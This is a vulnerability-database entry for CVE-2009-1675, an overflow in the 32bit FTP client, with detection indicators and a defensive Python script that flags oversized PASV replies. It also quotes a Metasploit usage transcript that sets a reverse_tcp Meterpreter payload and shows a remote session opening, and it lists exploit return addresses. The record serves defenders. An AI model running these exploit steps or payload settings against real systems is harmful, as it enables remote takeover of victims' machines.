CVE-2009-1675
Published: 2009-05-18

CVE-2009-1675: Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long 227 reply to a PASV command.
Priority: P3 · 54 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 13.79% (96.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| electrasoft | 32bit_ftp | — | — |
Detection & IOCs (extracted from sources)
- Detect a malicious FTP server sending an oversized 227 PASV reply (~966+ bytes of numeric padding followed by a return address) to exploit 32bit FTP client 09.04.24.
- Flag FTP 227 PASV responses exceeding normal length (normal is ~30 bytes); payloads here use ~966 bytes of numeric text before the return address.
- Payload bad characters for this exploit are null byte, newline, carriage return, and space (\x00\x0a\x0d\x20); the encoder used is AlphanumMixed, so look for alphanumeric shellcode in FTP 227 responses.
- The exploit also abuses overly long filenames served by a rogue FTP LIST reply (a separate but related attack vector in the same client).
- Return address 0x7c868667 (jmp esp, kernel32.dll) on Windows XP SP3 English is a reliable indicator of this specific exploit targeting that platform.
- The exploit targets only 32bit FTP client version 09.04.24; other versions are not confirmed vulnerable.
- Return addresses are platform-specific: 0x7c868667 for XP SP3 English and 0x7C82385D for XP SP2 French; detections relying on these hardcoded values will not generalise to other OS versions.
- The Metasploit module sets a StackAdjustment of -3500, meaning the payload stack pivot is large; this is relevant when tuning stack-pivot detection thresholds.
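The following Python is an added detection example for this record (not code from ElectraSoft, Exploit-DB or Metasploit). It runs the indicators listed above over FTP control-channel 227 replies: length far beyond the ~30-byte norm, a missing or malformed (h1,h2,h3,h4,p1,p2) tuple, long runs of numeric padding, the two return addresses quoted in the record in their on-the-wire little-endian form, and long alphanumeric runs that would fit an alphanumeric-encoded payload. The thresholds, the function names, and the sample replies are constructed assumptions, not values taken from the sources.

```python
"""Heuristic checks for anomalous FTP 227 (PASV) replies on the control channel.

Added example for this CVE record; not code from ElectraSoft, Exploit-DB or
Metasploit. Thresholds and sample replies are constructed assumptions.
"""
from __future__ import annotations

import re
import struct

# A well-formed 227 reply is roughly 30 bytes; the record notes ~966 bytes of
# padding in the exploit, so a generous sanity cap still separates the two.
MAX_SANE_227_LEN = 64   # assumption: tune per environment
MAX_ALNUM_RUN = 32      # assumption: longest benign alphanumeric token
MAX_DIGIT_RUN = 3       # IPv4 octets and port halves are at most 3 digits

# Expected shape: "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)."
PASV_TUPLE_RE = re.compile(
    rb"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)

# Return addresses quoted in the record (XP SP3 English, XP SP2 French),
# packed as they would appear on the wire (little-endian).
KNOWN_RETURN_ADDRS = {
    "0x7c868667": struct.pack("<I", 0x7C868667),
    "0x7C82385D": struct.pack("<I", 0x7C82385D),
}


def analyze_227_reply(reply: bytes) -> list[str]:
    """Return human-readable findings for one reply line; [] means it looks normal."""
    findings: list[str] = []
    line = reply.rstrip(b"\r\n")
    if not line.startswith(b"227"):
        return findings  # only PASV replies are in scope

    if len(line) > MAX_SANE_227_LEN:
        findings.append(f"oversized 227 reply: {len(line)} bytes (normal ~30)")

    m = PASV_TUPLE_RE.search(line)
    if m is None:
        findings.append("no well-formed (h1,h2,h3,h4,p1,p2) tuple")
    elif any(int(field) > 255 for field in m.groups()):
        findings.append("PASV tuple field outside 0-255")

    longest_digits = max((len(r) for r in re.findall(rb"\d+", line)), default=0)
    if longest_digits > MAX_DIGIT_RUN:
        findings.append(f"numeric padding run of {longest_digits} digits")

    for label, wire in KNOWN_RETURN_ADDRS.items():
        if wire in line:
            findings.append(f"known return address {label} present")

    # Alphanumeric encoders produce long letter/digit runs; require at least one
    # letter so plain digit padding is reported only once (above).
    for run in re.findall(rb"[A-Za-z0-9]+", line):
        if len(run) > MAX_ALNUM_RUN and re.search(rb"[A-Za-z]", run):
            findings.append(f"alphanumeric run of {len(run)} bytes (possible encoded payload)")
            break

    return findings


def scan_control_channel(data: bytes) -> dict[int, list[str]]:
    """Run the checks over a captured server-to-client control stream, keyed by line number."""
    results: dict[int, list[str]] = {}
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        hits = analyze_227_reply(raw)
        if hits:
            results[lineno] = hits
    return results


# Constructed sample replies (not captured traffic).
SAMPLE_BENIGN = b"227 Entering Passive Mode (192,168,1,2,4,1).\r\n"
SAMPLE_OVERSIZED = b"227 Entering Passive Mode (" + b"1" * 966 + b")\r\n"
SAMPLE_RETADDR = (
    b"227 Entering Passive Mode (10,0,0,5,7,210)."
    + KNOWN_RETURN_ADDRS["0x7c868667"]
    + b"\r\n"
)
SAMPLE_STREAM = (
    b"220 ftp ready\r\n230 Login successful\r\n"
    + SAMPLE_BENIGN
    + b"200 Type set to I\r\n"
    + SAMPLE_OVERSIZED
)

if __name__ == "__main__":
    for name, sample in [("benign", SAMPLE_BENIGN), ("oversized", SAMPLE_OVERSIZED), ("retaddr", SAMPLE_RETADDR)]:
        print(name, analyze_227_reply(sample) or "ok")
    print(scan_control_channel(SAMPLE_STREAM))
```

The length and digit-run checks are the ones that generalise; the return-address match is deliberately narrow, as the record itself notes, and should be treated as a high-confidence but platform-specific signature rather than the primary rule.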
No detection rules found.
Exploit-DB

32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
exploitdb · 2009-05-07

Module header (usage transcript quoted from the Exploit-DB entry; truncated on the page):

```text
#msf > use exploit/windows/ftp/32bitftp_pasv_reply
#msf exploit(32bitftp_pasv) > set PAYLOAD windows/meterpreter/reverse_tcp
#PAYLOAD => windows/meterpreter/reverse_tcp
#msf exploit(32bitftp_pasv) > set LHOST 192.168.1.2
#LHOST => 192.168.1.2
#msf exploit(32bitftp_pasv) > exploit
#[*] Exploit running as background job.
#msf exploit(32bitftp_pasv) >
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Server started.
# Victim connecting to the malicious ftp server.
#[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
#[*] Sending stage (2650 bytes)
#[*] Sleeping before handling stage...
#[*] Uploading DLL (75787 bytes)...
#[*] Upload completed.
#[*] Meterpreter session 1 opened (192.168
```
Metasploit

32bit FTP Client Stack Buffer Overflow
metasploit

This module exploits a stack buffer overflow in the 32bit FTP client, triggered when trying to download a file that has an overly long filename.
No writeups or analysis indexed.
References

- http://www.securityfocus.com/bid/34838
- https://exchange.xforce.ibmcloud.com/vulnerabilities/50337
- https://exchange.xforce.ibmcloud.com/vulnerabilities/50644
- https://www.exploit-db.com/exploits/8623